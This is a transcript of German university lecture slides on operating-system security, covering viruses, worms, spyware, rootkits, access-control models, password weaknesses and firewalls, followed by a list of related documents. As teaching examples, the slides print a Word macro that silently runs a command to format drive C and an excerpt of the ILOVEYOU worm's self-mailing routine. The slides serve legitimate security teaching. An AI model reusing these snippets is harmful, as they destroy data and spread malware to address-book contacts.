Schutz und Sicherheit

Größe: px
Ab Seite anzeigen:

Download "Schutz und Sicherheit"

Transkript

1 Schutz und Sicherheit Teil 3 Prof. Dr. Margarita Esponda Freie Universität Berlin WS 2011/2012 1

2 Gegenmaßnahme mit Hardware-Unterstützung Die NX-Bit Abkürzung von No execute-bit ist eine einfache Hardware-Unterstützung zur Verbesserung der Sicherheit eines Computers. Zuerst von AMD mit dem Prozessor Athlon 64 x86-markt eingeführt mit dem Namen Enhanced Virus Protection (EVP) Intel verwendet in seinen neuesten Prozessoren die gleiche Technik mit der Bezeichnung XD-Bit (Execute Disable). Andere Firmen verwenden ähnliche Techniken. Mit dem NX-Bit können Speichersegmente mit Daten von Speichersegmenten mit Programmcode unterschieden werden. Dieser Schutz funktioniert allerdings nur mit Betriebssystemen, die die Unterstützung des NX-Bit ausnutzen. 2

3 Offenlegung von Schwachstellen in Betriebssystemen Apple Linux Sun Solaris Microsoft BSD Quelle: IBM X-Force 3

4 Kritische Schwachstellen in Betriebssystemen Apple Linux Sun Solaris Microsoft BSD Quelle: IBM X-Force 4

5 Warum gibt es so viele Schwachstellen? - Warum schreiben Programmierer unsichere Software? - Zu wenig Kurse über Sicherheit - Sicherheit wird oft in Programmier-Aufgaben nicht erwähnt - C ist eine unsichere Programmiersprache - Programmierer machen sich eher sorgen über andere Probleme - Benutzer machen sich keine Sorgen über Sicherheit - Sicherheit ist teuer und nimmt Zeit in Anspruch - die Firmen wollen Geld sparen 5

6 Viren Ein Computer-Virus ist ein Programm, das sich vervielfältigt, indem es sich an den Code von anderen Programmen anhängt. Viren sind auf Betriebssysteme, Systemarchitektur oder bestimmte Anwendungen spezialisiert Ein virus dropper, der normalerweise ein Trojaner ist, fügt das Virus in das System ein. 6

7 Viren Es gibt eine lange Liste von Virussorten, von denen einige wichtige hier aufgelistet sind: File Boot Macro Source code Polymorphic Encrypted Stealth Tunneling Multipartite Armored 7

8 Datei-Viren Das Virus hängt sich an das Ende einer Datei und ändert den Start des Programms, so dass mit Hilfe eines Sprungbefehls die Ausführung des Programms mit dem neu eingefügten Code anfängt. Nach der Ausführung des Virus- Codes geht die Kontrolle zurück in die normale Ausführung des Programms. Infiziertes Ausführbare- Code Malware 8

9 Bootsektor-Viren Infiziert den Boot-Sektor des Systems und wird jedes Mal ausgeführt, bevor das Betriebssystem geladen wird. Bootsektor-Viren suchen sich weitere Boot-Sektoren (andere Festplatten, Memory-Sticks, usw.), um diese ebenfalls zu infizieren. Auch bekannt als Speicherviren. Zuerst wird der echte Bootsektor auf einen sicheren Platz auf der Platte kopiert. Das Virus kopiert sich selber in dem Bootsektor. 9

10 Bootsektor-Viren Wenn der Computer hochgefahren wird, kopiert sich das Virus selbst im Speicher vorne oder zwischen unbenutzten Interrupt- Vektoren. Diese erste Phase passiert im Kernmodus, bevor das Betriebssystem, die MMU und Antiviren-Programme gestartet werden. Zum Schluss fährt das Virus-Programm das Betriebssystem hoch und bleibt im Speicher. Das Virusprogramm infiziert von da aus alle Speichermedien, die in Sicht kommen. 10

11 Boot-Viren 11

12 Makro-Viren Makroviren werden meistens in interpretierbaren Sprachen geschrieben wie z.b. Visual Basic. Ein Makro ist ein Programm, das in einem Dokument eingebettet ist. Beispiel: Sub AutoOpen() Dim ofs Set ofs = CreateObject( "Scripting.FileSystemObject" ) vs = Shell( "c:command.com /k format c:",vbhide) End Sub Eine überwiegende Anzahl wird in VBA und VBS geschrieben und durch Office- und Staroffice-Dokumente verbreitet. 12

13 Beispiel: Makroviren Das bekannte Melisa-Virus, das am 26. März 1999 gestartet worden ist. Verbreitet sich durch Word-Dokumente, die per gesendet worden sind. Die Word-Dokumente beinhalteten einen VBA-Macro, der aus dem Outlook-Adressbuch neue -Adressen holte und weitere s mit dem infizierten Word-Dokument sendete. Der "ILOVEYOU"-Virus wurde auch in VBS geschrieben und wurde am gestartet. 328 Programmzeilen verursachten $10 Milliarden Schaden. Es ist kein schwieriges Programm gewesen, das vor allem die Vulnerabilität des Windows Betriebssystems zeigte. 13

14 LoveLetter.VBS sub spreadto () for ctrlists = 1 to mapi.addresslists.count set a = mapi.addresslists(ctrlists) x=1 for ctrentries = 1 to a.addressentries.count malead = a.addressentries(x) set male=out.createitem(0) male.recipients.add( malead ) male.subject = ILOVEYOU male.body = kindly check the attached LOVELETTER coming from me. male.attachments.add(dirsystem& \LOVE-LETTER-FOR-YOU.TXT.vbs ) male.send x=x+1 next next end sub 14

15 Viren Source code Sucht nach Quellcode-Programm und verändert diese. Polymorphic Verändert sich, um zu vermeiden, dass Antiviren-Programme diese erkennen. Programmviren haben eine Signatur. Encrypted Um von Antiviren-Programmen unerkannt zu bleiben, sind einige Viren noch Mal verschlüsselt. Vor der Ausführung entschlüsseln sie sich selber. Stealth Versucht das Viruserkennung-System zu verändern. Multipartite Infiziert mehrere Stellen wie Speicher, Boot-Sektors, Dateien und erschwert damit die Erkennung. Armored Besonders schwer zu verstehen, weil dieses Virus manchmal komprimiert oder versteckt hinter Dateiattributen oder Namen ist. 15

16 Viren Gerätetreiberviren Unter Windows und einigen UNIX-Systemen sind Gerätetreiber ausführbare Programme, die auf der Festplatte leben und während des Bootvorgangs geladen werden. Gerätetreiber laufen im Kernmodus und besitzen damit dann alle Möglichkeiten, das System zu beschädigen. Eine wichtige Einschränkung wäre es, Gerätetreiber nur im Benutzermodus laufen zu lassen. 16

17 Quellcode-Viren Plattformunabhängig Sucht nach C-Quellprogrammen Die Zeile #include <virus.h> wird eingefügt. Um den Virus zu aktivieren, muss noch eine richtige Stelle gefunden werden, um die Startfunktion aufzurufen. start_virus(); 17

18 Polymorphe Viren Beispiel: X = ( A+B+C-4 ) Quelle: Tanenbaum 18

19 Würmer Computerwürmer sind selbstreplizierende Programme, die sich über das Netz verbreiten und damit größeren Schaden anrichten können. Sie verbreiten sich meistens schneller als Viren, weil sie sich selbst fortbewegen können. 19

20 Würmer Beispiel: von Robert Tappan Morris Zwei Programme: Ladeprogramm und eigentliches Wurmprogramm. Das Ladeprogramm (99 Zeilen C-Programm), von angegriffenen Systemen übersetzt und ausgeführt, baute eine Verbindung zum Stammrechner und holte dann das Wurmprogramm. Das Wurmprogramm durchsuchte die Routing-Tabellen, und versuchte, in neuen Maschinen das Ladeprogramm zu verbreiten. 20

21 Würmer 3 Methoden wurden für die Verbreitung des Ladeprogramms verwendet: rsh-schell, Finger-Daemon (Pufferüberlauf) sendmail (Debugging-Hintertür) Das Wurmprogramm selber versuchte Benutzer-Logins zu knacken in einem 3-stufigen Suchverfahren: - einfache Fälle ohne Passwort - Wörterbuch mit den 432 beliebtesten Passwörtern - jedes Wort aus dem standard-unix-on-line Wörterbuch Das ermöglichte es dem Wurm, weitere Maschinen zu infizieren. 21

22 Der Morris-Internet-Wurm Der Wurm prüfte in jeder neu eroberten Maschine, ob dort bereits ein Wurm lief und in 6 von 7 Fällen unterbrach er seine Ausführung selbst. Das Verhältnis (1:7) führte zu einer Wurmüberschwemmung, die viele Maschinen zum Stillstand brachte Rechner wurden überfallen. Das waren 10% der damaligen vernetzten Rechner. Morris wurde verurteilt, bekam eine Geldstrafe von Dollar, 3 Jahre auf Bewährung, und die Prozesskosten beliefen sich auf mehr als Dollar. 22

23 Der Morris-Internet-Wurm 23

24 Adware 24

25 Adware - enthält Code, der persönliche Informationen des Benutzers überwacht - die Internet-Verbindung des Benutzers wird im Hintergrund missbraucht, indem mit Hilfe von sogenannten "Back channels" persönliche Information gesendet wird. - Legal? oder Illegal? Adware ohne ausdrückliche Zustimmung des Benutzers = Spyware illegal 25

26 Schnüffelprogramme (Spyware) Definition von Barwinski et al. (2006) Versteckt sich, so dass das Opfer sie nicht leicht finden kann Sammelt Daten über den Benutzer (z.b. besuchte Websites, Passwörter, Kreditkartennummer, usw.) Sendet die gesammelte Information an ihre Urheber Es ist oft sehr schwierig aus dem System zu eliminieren 26

27 nach Barwinski et al. (2006) Spyware 3 Kategorien von Spyware: Marketing sammelt Information, um gezielte Werbung zu erzeugen. Überwachung von Unternehmen verwendet, um Angestellte zu überwachen. Malware Zombie-Prozesse liegen auf der Lauer, um Benutzerinformation zu missbrauchen. Hauptlieferanten: Unterhaltung für Erwachsene, Warez (illegal beschaffte Software), Online-Reisen und Immobilien 27

28 Spyware Moshchuk et al Millionen URLs wurden untersucht 6% hatten Spyware nach Studie von AOL/NSA sind 80% der PCs überfallen mit durchschnittlich 93 einzelnen Spyware-Programmen pro Rechner viel größere Infektionsrate durch Websites mit pornografischem Inhalt, kostenloser Software, Software zum Austauschen von Dateien in Peer-2-Peer-Netzwerken, usw. 28

29 Spyware Google Studie 2007 in-depth Analysis von 4,5 Milliarden Websites Der Anteil potenziell gefährlicher Websites in den Google- Trefferlisten ist demnach seit April 2007 von unter 0,4 Prozent auf mehr als 1,5 Prozent im Dezember gestiegen. Der Trend zeigt nach oben (nach Niels Provos). Immer mehr legitime Websites werden gehackt und als Malware- Schleudern missbraucht. Die Täter nutzen dabei jede sich bietende Sicherheitslücke aus. Schwachstellen gibt es überall, z.b. PHP-Anwendungen, Datenbanken, Content-Management-Systemen (CMS) oder Blog- Software. 29

30 Schnüffelprogramme (Spyware)... Google Studie ist nicht mehr die Hauptquelle von Malware, sondern Websites. 4 Verbreitungsmechanismen Infizieren von Webservern Webseiten mit Benutzerbeteiligung Eingefügte Werbung Third-party widgets Skriptsprachen (Javascript, VBScript, usw.) werden verwendet, um zuerst die Angreifbarkeit eines Rechners herauszufinden. Diese Information wird dann an Server weitergeleitet, um passende Angreifer zu fordern. Bot-Netze und Techniken, um sich vor Antiviren-Software zu verstecken. 30

31 Port Scanning Wird verwendet, um Angriffsstellen zu finden. Es gibt eine Reihe von Tools, die eine Untermenge der typischen Programmierfehler und Schwachstellen in einem System untersucht. nmap Nessus Bei Angreifern und Administratoren sehr beliebt. 31

32 Rootkits Eine Sammlung von Programmen und Dateien, die versucht, ihre Existenz zu verbergen. Das Rootkit enthält Malware, oder Hintertüren, die ebenfalls versteckt werden. Sorten von Rootkits - Hypervisor eine virtuelle Maschine als Rootkit - Speicher existieren nur im Arbeitsspeicher des laufenden Systems - Kern ersetzt Teile des Betriebssystemkerns - Bibliothek versteckt sich in Bibliothekprogrammen (DLLs) - Anwendung versteckt sich in modifizierten Systemprogrammen - Firmware durch ein BIOS-Reflash oder Manipulation des ACPI - Advanced Configuration and Power Interface 32

33 Rootkits Erstaunlich viele Firmen verwenden Rootkits als Kopierschutz von ihren Produkten Sony BMG, XCP Extended Copy Protection für Musik-CDs verwendete ein Rootkits, der sich in Windows-Systemen installierte. USB-Stick mit Finger-Abdruckleser von Sony versteckte ein Rootkit in Windows-Verzeichnissen. Kinowelt verkauft DVDs mit einem Kopierschutz, der unter Windows ein Rootkit zum Verstecken von Prozessen installiert. Die Firma EA hat in ihrem Spiel Spore im DRM-Paket des Programms ein Rootkit, um den Kopierschutz mit Online- Authentifizierung zu verbergen. 33

34 2005. Sony BMG Das Sony-Rootkit auroruninf-datei in ca. 20 Millionen CDs, die ein 12 MB-Rootkit in den Rechnern installierte um die Musik zu hören, mussten die Benutzer eine Lizenzvereinbarung akzeptieren. Dabei wurde das Rootkit installiert, unabhängig davon, ob die Lizenz akzeptiert worden war oder nicht Eine Reihe von $sys$-dateien wurden installiert und eine davon war ein Filter, der alle CD-ROM-Systemaufrufe abhörte und alle Musikprogramme außer dem Sony-Programm verbot. Der Rootkit überwachte Hörangewohnheiten von Benutzern und sendete die Information an Sony. Ein fehlerhafter Verbergungsmechanismus löschte alle Einträge, die mit $sys$ begannen. Ein Deinstallationsprogramm mit technischen Fehlern hinterließ angriffsanfällige Rechner. Teilweise Code aus Open-Source 34

35 Rootkits Verstecke Anwendung Anwendung Anwendung Anwendung Anwendung System- Bibliothek System- Bibliothek System- Bibliothek System- Bibliothek System- Bibliothek Betriebssystem Betriebssystem Hypervisor Betriebssystem Betriebssystem Betriebssystem HW (BIOS) HW (BIOS) HW (BIOS) HW (BIOS) HW (BIOS) 35

36 Multilevel-Sicherheit DAC Discretionary Access Control Die meisten Betriebssysteme bieten eine benutzerbestimmbare Zugriffskontrolle (DAC) Nicht ausreichend an Stellen, wo stärkere Sicherheit notwendig wird, z.b. Krankenhäuser, Polizei, Patentanmeldung, usw. Lösung: MAC Mandatory Access Control. Systembestimmbare Zugriffskontrolle MAC-Mechanismen kontrollieren den Informationsfluss 36

37 Das Bell-LaPadula-Modell Am meisten verbreitetes Multilevel-Sicherheitsmodell Von Bell und LaPadula in Jahr 1973 vorgeschlagen Für Militärische Sicherheit entwickelt Dokumente (Objekte) haben Sicherheitsstufen z.b. nicht klassifiziert vertraulich geheim streng geheim Benutzer bekommen dieselben Sicherheitsstufen zugeordnet Benutzer haben je nach zugeordneten Sicherheitsstufen verschiedene Zugriffsrechte auf die Dokumente. 37

38 Das Bell-LaPadula-Modell Regeln für den Informationsfluss 1. Simple-Security-Regel Ein Prozess, der auf Sicherheitsstufe k läuft, kann nur Objekte mit der Sicherheitsstufe k oder niedriger lesen. 2. *-Regel Ein Prozess, der auf Sicherheitsstufe k läuft, kann nur auf Objekte auf seiner oder einer höheren Stufe schreiben. Prozesse dürfen nach unten lesen und nach oben schreiben. 38

39 Sicherheitsstufe Das Bell-LaPadula-Modell Prozess 4 Schreiben 3 Objekt 2 Lesen 1 niedrigste Priorität-Stufe 39

40 Das Bell-LaPadula-Modell Die Information kann nur horizontal oder aufwärts fließen Jedem Benutzer bekommt eine Sicherheitsstufe zugewiesen. Diese Stufe wird zusammen mit anderen benutzerspezifischen Daten wie UID oder GID gespeichert. Beim Login bekommt die Shell des Benutzers diese Sicherheitsstufe und kann an Kinderprozesse vererbt werden. Prozesse können Dateien nicht öffnen, die zu einer größeren Sicherheitsstufe gehört. Das Bell-LaPadula-Modell ist für das Bewahren von Geheimnissen geeignet. 40

41 Das Biba-Modell Das Bell-LaPadula-Modell ist nicht dafür entwickelt, um die Integrität der Daten zu garantieren. Wir benötigen dafür ein Modell, das genau die umgekehrten Eigenschaften hat. 1. Simple-Integrity-Regel Ein Prozess, der auf Sicherheitsstufe k läuft, kann nur auf Objekte seiner oder einer niedrigeren Stufe schreiben. 2. Integrity-*Regel Ein Prozess, der auf Sicherheitsstufe k läuft, kann nur Objekte seiner oder einer höheren Stufe lesen 41

42 Authentifizierung Der meist verwendete Authentifizierung-Mechanismus wird durch die Aufforderung vom Login-Namen und Passwort realisiert. Das Passwortsystem ist die erste Verteidigung gegen Angreifer. Die Login-ID wird für die DAC Discretionary Access Control verwendet Der Eigentümer eines Objekts bestimmt, welche Rechte andere Benutzer über das Objekt haben. 42

43 Authentifizierung 43

44 Schwachstellen von Passwortsystemen Passworte können oft leicht geraten werden mit einer Liste typischer Passworte Morris und Thompson erstellten (1979) eine Liste von wahrscheinlichen Passwörtern - Vornamen, Nachnamen, - Straßen, Städte, - ein mittelgroßes Wörterbuch, - Autokennzeichen, - rückwärts geschriebene Wörter und - kurze Ketten zufälliger Buchstaben. Mehr als 86% aller Passwörter waren in der Liste Ähnliche Ergebnisse von Klein 1990 Andere Studie (Kabay 1997) konnte 82% Passwörter erraten 44

45 Schwachstellen von Passwortsystemen Das Wachstumm des Webs vergrößert das Problem, zeigt eine Studie von Florencio und Herley Jede Person muss immer mehr Passwörter auswendig lernen. Diese Überforderung führ zu einfachen und schwächeren Passwörtern. Das Internet ist zu einer unglaublichen Beute geworden. 45

46 Abwehrmechanismen Defense-in-Depths-Strategie mehrere Sicherheitsschichten Firewalls Zwei Varianten: Hardware und Software In einem Webserver kontrolliert die Firewall, dass die Kommunikation nur mittels http stattfindet. Hier hätte den Morris-Wurm nicht durchgehen können. Mit Hilfe von Firewalls können verschiedene Sicherheits-Domänen definiert werden. 46

47 Firewall Demilitarized Zone Bildquelle: Silverschatz, Galvin und Gagne 47

48 Abwehrmechanismen Hardware-Firewalls Zustandslose Header jedes kommenden Pakets werden untersucht Quell- und Ziel-IP-Adresse, Quell- und Zielports Art des Dienstes und des Protokolls Apache-Webserver sind trotz Firewalls angreifbar Zustandsbehaftete Verfolgen Verbindungen Angriffserkennungssystem (Intrusion Detection System IDS) Inhalte von Paketen werden auch untersucht Software-Firewalls Filter innerhalb des Betriebssystemkerns, die prinzipiell das gleiche wie Hardware-Firewall leisten 48

49 Firewall Probleme: Tunneling unerlaubtes Protokoll innerhalb erlaubtem Protokoll (z.b. telnet innerhalb von HTTP) IP-Spoofing Das Versenden von IP-Paketen mit gefälschter Absender-IP-Adresse 49

50 Firewall Bridging-Firewall Routing-Firewall Proxy-Firewall Personal firewall oder Desktop Firewall Application proxy firewall führt weitere Prüfungen zur Zugriffssteuerung und Protokollfunktionen System-call firewall Alle wichtige Systemaufrufe werden überwacht 50

Systeme 1. Kapitel 10 Sicherheit WS 2009/10 1

Systeme 1. Kapitel 10 Sicherheit WS 2009/10 1 Systeme 1 Kapitel 10 Sicherheit WS 2009/10 1 IBM System Storage-Kompendium Die IBM Speichergeschichte von 1952 bis 2010 http://www-03.ibm.com/systems/data/flash/de/resources/ ibm_storage_compendium_de.pdf

Mehr

Computerviren, Würmer, Trojaner

Computerviren, Würmer, Trojaner Computerviren, Würmer, Trojaner Computerviren, Würmer und Trojaner zählen zur Familie unerwünschter bzw. schädlicher Programme, der so genannten Malware. Diese Programme können sich selbst verbreiten und

Mehr

Sicherheitsaspekte unter Windows 2000

Sicherheitsaspekte unter Windows 2000 Sicherheitsaspekte unter Windows 2000 Margarete Kudak Sascha Wiebesiek 1 Inhalt 1. Sicherheit 1.1 Definition von Sicherheit 1.2 C2 - Sicherheitsnorm 1.3 Active Directory 2. Sicherheitslücken 3. Verschlüsselung

Mehr

Sicherheit. Bedeutung Gefahren. Mag. Friedrich Wannerer 1

Sicherheit. Bedeutung Gefahren. Mag. Friedrich Wannerer 1 Sicherheit Bedeutung Gefahren Mag. Friedrich Wannerer 1 Sicherheitsbegriff Unversehrtheit und Vertraulichkeit persönlicher Daten Datenschutzgesetz 2000 Bedrohungen q Dialer, Spam, Spyware, Viren, Würmer,

Mehr

Viren, Würmer, Trojaner

Viren, Würmer, Trojaner Viren, Würmer, Trojaner Was muss ich beachten? Ralf Benzmüller G DATA Software AG Überblick Einleitung Grundlegende Begriffe Gefahrensituation Zahlen und Daten Trends Infektionsmechanismen Viren Würmer

Mehr

Malware - Viren, Würmer und Trojaner

Malware - Viren, Würmer und Trojaner Department of Computer Sciences University of Salzburg June 21, 2013 Malware-Gesamtentwicklung 1984-2012 Malware-Zuwachs 1984-2012 Malware Anteil 2/2011 Malware Viren Würmer Trojaner Malware Computerprogramme,

Mehr

Handbuch ECDL 2003 Basic Modul 2: Computermanagement und Dateiverwaltung Grundbegriffe: Viren und Daten auf Viren prüfen

Handbuch ECDL 2003 Basic Modul 2: Computermanagement und Dateiverwaltung Grundbegriffe: Viren und Daten auf Viren prüfen Handbuch ECDL 2003 Basic Modul 2: Computermanagement und Dateiverwaltung Grundbegriffe: Viren und Daten auf Viren prüfen Dateiname: ecdl2_06_01_documentation_standard.doc Speicherdatum: 14.02.2005 ECDL

Mehr

Aufgabe 3 Storm-Worm

Aufgabe 3 Storm-Worm Aufgabe 3 Storm-Worm Bot: kompromittierte Maschine Kommunikationskanal, der dem Angreifer die Kontrolle über den Bot und somit das System gestattet Botnetz: Zusammenschluss mehrerer Bots koordinierte Distributed-Denial-Of-Service-Angriffe

Mehr

Computerviren. Institut fr Computerwissenschaften. Mihajlovic Roland rmihajlo@cosy.sbg.ac.at Reischmann Stefan sreisch@cosy.sbg.ac.

Computerviren. Institut fr Computerwissenschaften. Mihajlovic Roland rmihajlo@cosy.sbg.ac.at Reischmann Stefan sreisch@cosy.sbg.ac. Computerviren Mihajlovic Roland rmihajlo@cosy.sbg.ac.at Reischmann Stefan sreisch@cosy.sbg.ac.at Institut fr Computerwissenschaften Computerviren p.1/18 Der I LOVE YOU Virus Computerviren p.2/18 Geschichte

Mehr

Verschlüsselt und versperrt sicheres mobiles Arbeiten Mario Winter

Verschlüsselt und versperrt sicheres mobiles Arbeiten Mario Winter Verschlüsselt und versperrt sicheres mobiles Arbeiten Mario Winter Senior Sales Engineer 1 Das Szenario 2 Früher Auf USB-Sticks Auf Netzlaufwerken Auf CDs/DVDs Auf Laptops & PCs 3 Jetzt Im Cloud Storage

Mehr

Intrusion Detection Basics

Intrusion Detection Basics Intrusion Detection Basics Ziele von Angriffen Formen von Angriffen Vorgehensweise von Eindringlingen Überwachungsmöglichkeiten Tools: tripwire, iptraf, tcpdump, snort Ziele von Angriffen (Auswahl) Sport:

Mehr

MALWARE AM BEISPIEL VON STUXNET

MALWARE AM BEISPIEL VON STUXNET MALWARE AM BEISPIEL VON STUXNET IAV10/12 24.05.2011 Jan Heimbrodt Inhalt 1. Definition Was ist Malware? 2. Kategorisierung von Malware Viren, Würmer, Trojaner, 3. Was macht Systeme unsicher? Angriffsziele,

Mehr

F-Secure Anti-Virus for Mac 2015

F-Secure Anti-Virus for Mac 2015 F-Secure Anti-Virus for Mac 2015 2 Inhalt F-Secure Anti-Virus for Mac 2015 Inhalt Kapitel 1: Einstieg...3 1.1 Abonnement verwalten...4 1.2 Wie kann ich sicherstellen, dass mein Computer geschützt ist?...4

Mehr

DesktopSecurity. Schutz für den Windows-Arbeitsplatz PCs, Workstations und Laptops gegen Bedrohungen aus dem Internet

DesktopSecurity. Schutz für den Windows-Arbeitsplatz PCs, Workstations und Laptops gegen Bedrohungen aus dem Internet DesktopSecurity Schutz für den Windows-Arbeitsplatz PCs, Workstations und Laptops gegen Bedrohungen aus dem Internet Ralf Niederhüfner PROLINK internet communications GmbH 1 Desktop Security Szenarien

Mehr

Compliance mit dem IEM Endpoint Manager durchsetzen

Compliance mit dem IEM Endpoint Manager durchsetzen Compliance mit dem IEM Endpoint Manager durchsetzen PPPvorlage_sxUKMvo-05.00.potx santix AG Mies-van-der-Rohe-Straße 4 80807 München www.santix.de santix AG 2 Sicherheit in der IT Was bedeutet Sicherheit

Mehr

Sichere PCs und Laptops

Sichere PCs und Laptops Sichere PCs und Laptops Sicherheitstools mit der Bürgerkarte A-SIT Zentrum für Sichere Informationstechnologie Dipl.-Ing. Martin Centner SFG, 9. Februar 2006 A-SIT Zentrum für Sichere Informationstechnologie

Mehr

Sucuri Websiteschutz von

Sucuri Websiteschutz von Sucuri Websiteschutz von HostPapa Beugen Sie Malware, schwarzen Listen, falscher SEO und anderen Bedrohungen Ihrer Website vor. HostPapa, Inc. 1 888 959 PAPA [7272] +1 905 315 3455 www.hostpapa.com Malware

Mehr

Open for Business - Open to Attack? Walter Lender, Geschäftsführer, Visonys IT-Security Software GesmbH

Open for Business - Open to Attack? Walter Lender, Geschäftsführer, Visonys IT-Security Software GesmbH Open for Business - Open to Attack? Walter Lender, Geschäftsführer, Visonys IT-Security Software GesmbH 2 Open for Business - Open to Attack? 75% aller Angriffe zielen auf Webanwendungen (Gartner, ISS)

Mehr

Reale Angriffsszenarien - Überblick

Reale Angriffsszenarien - Überblick IT-Sicherheit heute - Angriffe, Schutzmechanismen, Umsetzung Reale Angriffsszenarien - Überblick kai.jendrian@secorvo.de Security Consulting GmbH, Karlsruhe Seite 1 Inhalt Praxisprobleme Aktuelle Angriffsmethoden

Mehr

Personal Firewall (PFW) und Virenscanner. Präsentation von Gunawati A.-Tillmann, Miguel Lopez und Andreas Angelkorte

Personal Firewall (PFW) und Virenscanner. Präsentation von Gunawati A.-Tillmann, Miguel Lopez und Andreas Angelkorte Personal Firewall (PFW) und Virenscanner Präsentation von Gunawati A.-Tillmann, Miguel Lopez und Andreas Angelkorte Gliederung Personal Firewall Virenscanner 1. Zweck einer Firewall 2. Funktionsweise einer

Mehr

Implementierung von Dateisystemen

Implementierung von Dateisystemen Implementierung von Dateisystemen Teil 2 Prof. Dr. Margarita Esponda WS 2011/2012 44 Effizienz und Leistungssteigerung Festplatten sind eine wichtige Komponente in jedem Rechnersystem und gleichzeitig

Mehr

Viren, Würmer, Trojaner und Malware-Scanner. Edgar Ebensperger Philipp Neulinger Manuel Schrempf

Viren, Würmer, Trojaner und Malware-Scanner. Edgar Ebensperger Philipp Neulinger Manuel Schrempf Viren, Würmer, Trojaner und Malware-Scanner Edgar Ebensperger Philipp Neulinger Manuel Schrempf Inhalt 1. Drei Arten von Malware 1. Definition 2. Geschichte, Ursprung und Beispiele 3. Arbeitsweise und

Mehr

9.3 Firewalls. HW/SW-System, oft auf separatem Rechner (oder mehreren Rechnern),

9.3 Firewalls. HW/SW-System, oft auf separatem Rechner (oder mehreren Rechnern), 9.3 Firewalls (firewall = Brandmauer) Firewall: HW/SW-System, oft auf separatem Rechner (oder mehreren Rechnern), typischerweise an der Übergangsstelle zwischen einem Teilnetz und dem Rest des Internet

Mehr

Reverse Cloud. Michael Weisgerber. Channel Systems Engineer DACH September 2013

Reverse Cloud. Michael Weisgerber. Channel Systems Engineer DACH September 2013 Reverse Cloud Michael Weisgerber Channel Systems Engineer DACH September 2013 Öffentliche Wahrnehmung - heute Flame Duqu Stuxnet Page 2 2011 Palo Alto Networks. Proprietary and Confidential. Öffentliche

Mehr

Truecrypt. 1. Was macht das Programm Truecrypt?

Truecrypt. 1. Was macht das Programm Truecrypt? Truecrypt Johannes Mand 09/2013 1. Was macht das Programm Truecrypt? Truecrypt ist ein Programm, das Speicherträgern, also Festplatten, Sticks oder Speicherkarten in Teilen oder ganz verschlüsselt. Daten

Mehr

F-Secure Anti-Virus for Mac Benutzerhandbuch

F-Secure Anti-Virus for Mac Benutzerhandbuch F-Secure Anti-Virus for Mac Benutzerhandbuch F-Secure Anti-Virus for Mac Inhaltsverzeichnis 3 Inhalt Kapitel 1: Einstieg...5 Was nach dem Installieren zu tun ist...6 Abonnement verwalten...6 Öffnen des

Mehr

Datenschutz. Schutz von Personen und Unternehmungen vor dem Missbrauch ihrer Daten. organisatorische Datenschutzmassnahmen

Datenschutz. Schutz von Personen und Unternehmungen vor dem Missbrauch ihrer Daten. organisatorische Datenschutzmassnahmen Datenschutz Schutz von Personen und Unternehmungen vor dem Missbrauch ihrer Daten. organisatorische Datenschutzmassnahmen gesetzliche Datenschutzmassnahmen www.datenschutz.ch K4.4 Datensicherheit - Datenschutz

Mehr

Allgemeine Hintergrundinformation über Viren

Allgemeine Hintergrundinformation über Viren Allgemeine Hintergrundinformation über Viren Allgemeine Hintergrundinformation über Viren 1. Was ist ein Virus? Ein Computervirus ist ein Programm oder eine Folge von Anweisungen, mit dem Ziel sich zu

Mehr

Andy Kurt Vortrag: 7.11.14. OSX - Computeria Meilen

Andy Kurt Vortrag: 7.11.14. OSX - Computeria Meilen Andy Kurt Vortrag: 7.11.14 OSX - Computeria Meilen 1 von 10 Andy Kurt Vortrag: 7.11.14 Screen IT & Multimedia AG Webseite: www.screen-online.ch Link Fernwartung: http://screen-online.ch/service/fernwartung.php

Mehr

KASPERSKY SECURITY FOR VIRTUALIZATION 2015

KASPERSKY SECURITY FOR VIRTUALIZATION 2015 KASPERSKY SECURITY FOR VIRTUALIZATION 2015 Leistung, Kosten, Sicherheit: Bessere Performance und mehr Effizienz beim Schutz von virtualisierten Umgebungen AGENDA - Virtualisierung im Rechenzentrum - Marktübersicht

Mehr

PC Hack erkennen 3 - Rootkits & versteckte Trojaner aufspühren

PC Hack erkennen 3 - Rootkits & versteckte Trojaner aufspühren PC Hack erkennen 3 - Rootkits & versteckte Trojaner aufspühren Eine weitere Möglichkeit, das ein PC mit einem Trojaner infiziert sein kann, ist z.b., wenn ein Backdoor Listener wie Netcat auf dem infiltriertem

Mehr

Security. Stefan Dahler. 6. Zone Defense. 6.1 Einleitung

Security. Stefan Dahler. 6. Zone Defense. 6.1 Einleitung 6. Zone Defense 6.1 Einleitung Im Folgenden wird die Konfiguration von Zone Defense gezeigt. Sie verwenden einen Rechner für die Administration, den anderen für Ihre Tests. In der Firewall können Sie entweder

Mehr

Informationssicherheit

Informationssicherheit Informationssicherheit Sibylle Schwarz Westsächsische Hochschule Zwickau Dr. Friedrichs-Ring 2a, RII 263 http://wwwstud.fh-zwickau.de/~sibsc/ sibylle.schwarz@fh-zwickau.de WS 2009/2010 Informationssicherheit

Mehr

Workshop Sicherheit im Netz KZO Wetzikon. Peter Skrotzky, 4. Dezember 2013

Workshop Sicherheit im Netz KZO Wetzikon. Peter Skrotzky, 4. Dezember 2013 Workshop Sicherheit im Netz KZO Wetzikon Peter Skrotzky, 4. Dezember 2013 Zentrale Fragen! Wie kann sich jemand zu meinem Computer Zugriff verschaffen?! Wie kann jemand meine Daten abhören oder manipulieren?!

Mehr

Viren - Wie sicher ist Mobile Commerce? Patrick Heinen Systems Engineer Symantec (Deutschland) GmbH

Viren - Wie sicher ist Mobile Commerce? Patrick Heinen Systems Engineer Symantec (Deutschland) GmbH Viren - Wie sicher ist Mobile Commerce? Patrick Heinen s Engineer (Deutschland) GmbH 1 Inhalt Viren, Würmer und Trojaner Definition Funktion Typen Geschichte Virenscannern - Abwehrmechanismen Anforderungen

Mehr

Exploits Wie kann das sein?

Exploits Wie kann das sein? Exploits Durch eine Schwachstelle im Programm xyz kann ein Angreifer Schadcode einschleusen. Manchmal reicht es schon irgendwo im Internet auf ein präpariertes Jpg-Bildchen zu klicken und schon holt man

Mehr

Desktop Personal Firewall und Virenscanner

Desktop Personal Firewall und Virenscanner Desktop Personal Firewall und Virenscanner Desktop Personal Firewall Was ist eine Firewall und wie kann diese unterschieden werden? Wie funktioniert eine Firewall? Was ist zu beachten? Virenscanner Was

Mehr

Selbstüberprüfung und Verhalten im Verdachtsfall Viren, Trojaner, Rootkits und andere Schadsoftware

